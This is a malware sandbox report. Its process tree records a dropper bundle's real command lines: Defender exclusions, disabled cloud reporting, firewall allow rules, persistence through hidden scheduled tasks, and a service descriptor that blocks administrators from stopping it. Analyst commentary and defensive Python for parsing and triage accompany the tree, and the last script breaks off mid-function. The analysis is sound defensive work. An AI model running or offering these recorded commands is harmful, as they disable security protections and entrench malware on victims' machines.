  [2] C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe  (PID 6052)
      cmd: "C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe  (PID 2780)
        cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        - Drops startup file
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe  (PID 5968)
          cmd: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
          - Executes dropped EXE
  [2] C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe  (PID 1312)
      cmd: "C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe"
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\SysWOW64\schtasks.exe  (PID 3780)
        cmd: schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe  (PID 2456)
        cmd: schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
        - Creates scheduled task(s)
  [2] C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe  (PID 2424)
      cmd: "C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe"
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5940)
        cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe"
        - Enumerates system info in registry
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 644)
          cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1952 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:8
          - Drops file in Program Files directory
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5096)
          cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:8
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4656)
          cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:2
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2640)
          cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:1
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4016)
          cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:1
  [2] C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe  (PID 1740)
      cmd: "C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe"
      - Executes dropped EXE
    [3] C:\Windows\SysWOW64\WerFault.exe  (PID 224)
        cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 2228
        - Program crash
  [2] C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe  (PID 2932)
      cmd: "C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  (PID 5168)
        cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  [2] C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe  (PID 1732)
      cmd: "C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
  [2] C:\Users\Admin\Documents\GuardFox\LghhhG5dYtl5hoIKD95UlVUg.exe  (PID 5992)
      cmd: "C:\Users\Admin\Documents\GuardFox\LghhhG5dYtl5hoIKD95UlVUg.exe"
      - Executes dropped EXE
  [2] C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe  (PID 5984)
      cmd: "C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\Documents\GuardFox\vGrIU7ib1YOS2PYSmzDAoF5v.exe  (PID 5648)
      cmd: "C:\Users\Admin\Documents\GuardFox\vGrIU7ib1YOS2PYSmzDAoF5v.exe"
      - Executes dropped EXE
  [2] C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe  (PID 5640)
      cmd: "C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe"
      - Executes dropped EXE
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe  (PID 5624)
      cmd: "C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 5348)
        cmd: powershell -nologo -noprofile
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe  (PID 3036)
        cmd: "C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2816)
          cmd: powershell -nologo -noprofile
          - Modifies data under HKEY_USERS
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe  (PID 3284)
          cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        [5] C:\Windows\system32\netsh.exe  (PID 5832)
            cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            - Modifies Windows Firewall
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2892)
          cmd: powershell -nologo -noprofile
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4680)
          cmd: powershell -nologo -noprofile
      [4] C:\Windows\rss\csrss.exe  (PID 2544)
          cmd: C:\Windows\rss\csrss.exe
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4408)
            cmd: powershell -nologo -noprofile
        [5] C:\Windows\SYSTEM32\schtasks.exe  (PID 2808)
            cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            - Creates scheduled task(s)
        [5] C:\Windows\SYSTEM32\schtasks.exe  (PID 2424)
            cmd: schtasks /delete /tn ScheduledUpdate /f
            - Blocklisted process makes network request
            - Executes dropped EXE
            - Drops Chrome extension
            - Drops file in System32 directory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1800)
            cmd: powershell -nologo -noprofile
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 3764)
            cmd: powershell -nologo -noprofile
        [5] C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe  (PID 5612)
            cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        [5] C:\Windows\SYSTEM32\schtasks.exe  (PID 1460)
            cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            - Creates scheduled task(s)
        [5] C:\Windows\windefender.exe  (PID 5348)
            cmd: "C:\Windows\windefender.exe"
          [6] C:\Windows\SysWOW64\cmd.exe  (PID 3784)
              cmd: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            [7] C:\Windows\SysWOW64\sc.exe  (PID 5688)
                cmd: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                - Launches sc.exe
  [2] C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe  (PID 5616)
      cmd: "C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 5484)
        cmd: powershell -nologo -noprofile
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe  (PID 6076)
        cmd: "C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"
        - Executes dropped EXE
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2064)
          cmd: powershell -nologo -noprofile
        [5] C:\Windows\System32\Conhost.exe  (PID 3652)
            cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      [4] C:\Windows\system32\cmd.exe  (PID 4956)
          cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        [5] C:\Windows\system32\netsh.exe  (PID 1708)
            cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            - Modifies Windows Firewall
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 5144)
          cmd: powershell -nologo -noprofile
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4596)
          cmd: powershell -nologo -noprofile
  [2] C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe  (PID 5288)
      cmd: "C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe  (PID 5276)
      cmd: "C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe  (PID 5260)
      cmd: "C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe"
      - Executes dropped EXE
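The `cmd.exe /C sc sdset WinDefender ...` step in the csrss.exe chain above rewrites the security descriptor of the service named WinDefender (the dropped C:\Windows\windefender.exe runs as PID 5348 in the same chain and again later as PID 5064). Read as SDDL, the DACL keeps the usual LOCAL SYSTEM, Interactive and Service-logon ACEs but changes the Administrators entry twice over: the allow ACE (A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA) omits WP (SERVICE_STOP) and DT (SERVICE_PAUSE_CONTINUE), and an explicit (D;;WPDT;;;BA) denies both, so `sc stop` or `net stop` from an elevated shell fails with access denied while the service keeps running. The descriptor does leave WD (WRITE_DAC) and WO (WRITE_OWNER) with Administrators, so an admin can rewrite it with `sc sdset` and then stop the service; a deny ACE is also matched against every group SID in the caller's token, so any token that merely contains the Administrators group is bound by it as well. The Python below is an added example and is not part of the sandbox output or of the sample: it parses the recorded descriptor and reports the stop protection. BASELINE is an assumption (the descriptor a newly created service commonly carries, used only for comparison), and effective_rights matches ACEs that name the SID literally, without expanding group membership.

```python
"""Parse the service SDDL passed to `sc sdset` and report stop-protection ACEs.
Added example; SDSET_ARG is copied from the report, BASELINE is an assumed default."""
import re

# Two-letter right tokens as they appear in service-object SDDL strings.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
SID_NAMES = {"SY": "LOCAL SYSTEM", "BA": "BUILTIN\\Administrators",
             "IU": "Interactive users", "SU": "Service logon users", "WD": "Everyone"}
STOP_RIGHTS = {"WP", "DT"}          # what `sc stop` / `sc pause` need
ADMIN_SIDS = {"BA", "S-1-5-32-544"}

# Argument recorded for sc.exe (PID 5688) in the process tree above.
SDSET_ARG = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Assumption: the descriptor a newly created service usually carries, for comparison.
BASELINE = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
            "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def split_rights(field):
    """Rights are two-letter tokens run together; a hex mask (0x...) is kept whole."""
    if field.startswith("0x"):
        return {field}
    if len(field) % 2:
        raise ValueError(f"odd-length rights field: {field!r}")
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def parse_ace(body):
    """ACE fields: type;flags;rights;object_guid;inherit_object_guid;sid."""
    ace_type, flags, rights, _obj, _inherit, sid = body.split(";")[:6]
    return {"type": ace_type, "flags": flags, "rights": split_rights(rights), "sid": sid}


def parse_sddl(sddl):
    """Split the O:/G:/D:/S: components; DACL and SACL become lists of ACE dicts."""
    sd = {"owner": None, "group": None, "dacl": [], "sacl": []}
    for chunk in re.split(r"(?=\b[OGDS]:)", sddl):
        if not chunk:
            continue
        tag, body = chunk[0], chunk[2:]
        if tag == "O":
            sd["owner"] = body
        elif tag == "G":
            sd["group"] = body
        else:
            aces = [parse_ace(m) for m in re.findall(r"\(([^)]*)\)", body)]
            sd["dacl" if tag == "D" else "sacl"] = aces
    return sd


def effective_rights(sd, sid):
    """Allow minus deny over the ACEs that name exactly this SID (deny wins in a
    canonical DACL). Group membership is not expanded here."""
    allowed, denied = set(), set()
    for ace in sd["dacl"]:
        if ace["sid"] != sid:
            continue
        if ace["type"] == "A":
            allowed |= ace["rights"]
        elif ace["type"] == "D":
            denied |= ace["rights"]
    return {SERVICE_RIGHTS.get(r, r) for r in allowed - denied}


def stop_protection_findings(sddl):
    """Describe how the DACL keeps administrators from stopping or pausing the service."""
    findings = []
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["sid"] not in ADMIN_SIDS:
            continue
        who = SID_NAMES.get(ace["sid"], ace["sid"])
        if ace["type"] == "D" and ace["rights"] & STOP_RIGHTS:
            names = ", ".join(sorted(SERVICE_RIGHTS[r] for r in ace["rights"] & STOP_RIGHTS))
            findings.append(f"explicit deny of {names} for {who}")
        elif ace["type"] == "A" and not STOP_RIGHTS <= ace["rights"]:
            names = ", ".join(sorted(SERVICE_RIGHTS[r] for r in STOP_RIGHTS - ace["rights"]))
            findings.append(f"allow ACE for {who} omits {names}")
    return findings


if __name__ == "__main__":
    for line in stop_protection_findings(SDSET_ARG):
        print(line)
```

Run against SDSET_ARG the script reports both the omitted rights in the Administrators allow ACE and the explicit deny; against BASELINE it reports nothing. The same parser can be pointed at the output of `sc sdshow <service>` on a live host to hunt for services whose DACL has been altered this way.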
[1] C:\Windows\system32\svchost.exe  (PID 1528)
    cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
[1] C:\Windows\system32\svchost.exe  (PID 4300)
    cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
[1] C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe  (PID 748)
    cmd: "C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\SysWOW64\icacls.exe  (PID 5144)
      cmd: icacls "C:\Users\Admin\AppData\Local\60fd73a9-b566-4ebe-bf13-7efa1ba8c839" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      - Modifies file permissions
  [2] C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe  (PID 5020)
      cmd: "C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe" --Admin IsNotAutoStart IsNotTask
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe  (PID 5204)
        cmd: "C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe" --Admin IsNotAutoStart IsNotTask
        - Executes dropped EXE
      [4] C:\Windows\SysWOW64\WerFault.exe  (PID 1136)
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 568
          - Program crash
[1] C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe  (PID 1564)
    cmd: "C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -i
    - Executes dropped EXE
[1] C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe  (PID 4092)
    cmd: "C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -s
    - Executes dropped EXE
[1] C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe  (PID 3080)
    cmd: .\Install.exe /iFFhdidlQI "525403" /S
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - Enumerates system info in registry
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 5504)
      cmd: powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\forfiles.exe  (PID 2668)
      cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 5264)
        cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
      [4] \??\c:\windows\SysWOW64\reg.exe  (PID 2500)
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
      [4] \??\c:\windows\SysWOW64\reg.exe  (PID 5460)
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
  [2] C:\Windows\SysWOW64\forfiles.exe  (PID 3652)
      cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 5672)
        cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
      [4] \??\c:\windows\SysWOW64\reg.exe  (PID 5920)
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
      [4] \??\c:\windows\SysWOW64\reg.exe  (PID 5812)
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 5164)
      cmd: schtasks /CREATE /TN "gXZzXSySt" /SC once /ST 10:21:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 3404)
      cmd: schtasks /run /I /tn "gXZzXSySt"
  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 1000)
      cmd: schtasks /DELETE /F /TN "gXZzXSySt"
  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 4836)
      cmd: schtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 11:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe\" Fm /zesite_idOIT 525403 /S" /V1 /F
      - Creates scheduled task(s)
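The 7zS2229.tmp\Install.exe stage above is a run of defence-evasion steps rather than payload. It asks WMI (root\SecurityCenter2) which AV is registered, then uses forfiles.exe as a proxy to start cmd.exe, which writes Defender policy values into both registry views: Exclusions\Extensions\exe = 0 (all .exe files excluded from scanning) and Spynet\SpyNetReporting = 0 (cloud reporting off). It then creates, runs and immediately deletes the task gXZzXSySt, whose action is a hidden PowerShell -EncodedCommand; the base64 is UTF-16LE text and decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which is why a hidden powershell.EXE followed by gpupdate.exe /force appears further down the tree: the refresh makes the freshly written policy take effect at once. The second task, beMXFFiCiqlBKkvOrW, runs hRDMMfa.exe as SYSTEM, and that process (seen later with exactly the task's arguments) sets ThreatIDDefaultAction = 6 for a list of threat IDs, 6 being Defender's "Allow" action. The csrss.exe chain earlier uses the same building blocks for its own persistence: a netsh allow rule and an ONLOGON/HIGHEST task for C:\Windows\rss\csrss.exe, a system-process name outside System32. The Python below is an added example and is not part of the report or of the sample: it runs a small set of triage rules over process-creation events. EVENTS is constructed from command lines in the tree with the PIDs as reported; the rule names, TRUSTED_DIRS and SYSTEM_PROCESS_NAMES are assumptions of the example. Whether the policy writes actually change Defender's behaviour depends on the tamper-protection state of the host, so the rules alert on the attempt.

```python
"""Triage rules over the process-creation command lines recorded in this report.
Added example: EVENTS is constructed from the tree above; rule names, TRUSTED_DIRS and
SYSTEM_PROCESS_NAMES are assumptions of the example, not sandbox output."""
import base64
import re
from ntpath import basename

DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",  # ThreatIDDefaultAction
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}
SYSTEM_PROCESS_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "services.exe",  # assumed: only in System32
                        "wininit.exe", "winlogon.exe", "svchost.exe"}
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")


def is_trusted_path(path):
    return path.lower().startswith(TRUSTED_DIRS)


def decode_encoded_command(cmdline):
    """Script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def defender_policy_changes(cmdline):
    """(subkey, value name, data) for each REG ADD under the Defender policy key, also
    when the command is nested in a forfiles/cmd wrapper that escapes its quotes."""
    text = cmdline.replace('\\"', '"')
    out = []
    for key, opts in re.findall(
            r'\bADD\s+"(HKLM\\[^"]+)"((?:\s+/[\w:]+(?:\s+(?:"[^"]*"|[^/\s]\S*))?)*)', text, re.I):
        if key.lower().startswith(DEFENDER_POLICY.lower()):
            o = dict(re.findall(r'/([\w:]+)(?:\s+("[^"]*"|[^/\s]\S*))?', opts))
            out.append((key[len(DEFENDER_POLICY):].lstrip("\\"), o.get("v", "").strip('"'), o.get("d", "")))
    return out


def describe(subkey, value, data):
    s = subkey.lower()
    if s == r"threats\threatiddefaultaction":
        return f"ThreatIDDefaultAction {value} -> {data} ({THREAT_ACTIONS.get(data, 'unknown')})"
    if s.startswith("exclusions"):
        return f"exclusion added: {subkey} = {value}"
    if s == "spynet" and value.lower() == "spynetreporting" and data == "0":
        return "cloud (MAPS) reporting disabled"
    return f"{subkey} {value} = {data}"


def firewall_allow_program(cmdline):
    """Program path of a `netsh advfirewall firewall add rule ... action=allow`, or None."""
    m = re.search(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b(.*)", cmdline, re.I)
    args = {k.lower(): v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', m.group(1))} if m else {}
    return args.get("program") if args.get("action", "").lower() == "allow" else None


def scheduled_task(cmdline):
    """Action, task name, elevation and target binary of a schtasks command, or None."""
    if not re.search(r"\bschtasks(?:\.exe)?\s", cmdline, re.I):
        return None

    def opt(name):  # value of /name, with outer quotes removed and \" unescaped
        m = re.search(rf'/{name}\s+("(?:[^"\\]|\\.)*"|\S+)', cmdline, re.I)
        return m.group(1).strip('"').replace('\\"', '"') if m else None

    action = re.search(r"/(create|run|delete|change)\b", cmdline, re.I)
    tr = opt("tr")  # "<exe> <args>"; the exe itself may be quoted again
    exe = (tr[1:tr.index('"', 1)] if tr.startswith('"') else tr.split()[0]) if tr else None
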